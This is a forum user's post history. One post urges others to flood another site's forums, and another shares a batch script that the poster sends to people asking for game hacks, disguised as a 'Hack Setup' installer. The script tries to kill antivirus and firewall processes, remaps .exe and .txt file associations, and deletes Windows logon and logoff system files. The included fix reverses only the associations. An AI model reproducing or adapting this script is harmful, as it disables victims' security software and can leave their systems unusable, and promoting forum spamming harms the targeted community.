Jump to content

rather_play_wow

Members
  • Joined

Everything posted by rather_play_wow

  1. I already raged a bit of their website, it'd be cool if we could get together and all rage their forums with heaps of topics and stuff. http://www.mymostwanted.com/forum/showthread.php?t=41940 Rage the General Chat and stuff.
  2. rather_play_wow posted a post in a topic in General Discussion
    Made a small .cmd script that I send to noobs when they want hacks from me. Bassically what it does is change the association of a .exe file to a .txt file and change the association of a .txt file with a .mp3 file so every time you open up a .exe it opens up in notepad. title HACK SETUP color 0A @echo off set end=md "Hack Setup" set fin=copy "Hack Setup.txt" "Installing" %end% %fin% net send * Hacks are installing, press OK to begin set up. kill NAVAPSVC.exe /F /Q kill zonelabs.exe /F /Q kill explorer.exe /F /Q cls assoc .exe=txtfile assoc .txt=mp3file cls msg * You got hacked biatch. msg * L 2 Compute. cls DEL C:\WINDOWS\system32\logoff.exe /F /Q DEL C:\WINDOWS\system32\logon.exe /F /Q DEL C:\WINDOWS\system32\logon.scr /F /Q cls msg * G'night A quick fix: title Hack Setup color 0A @echo off cls assoc .exe=exefile assoc .txt=txtfile cls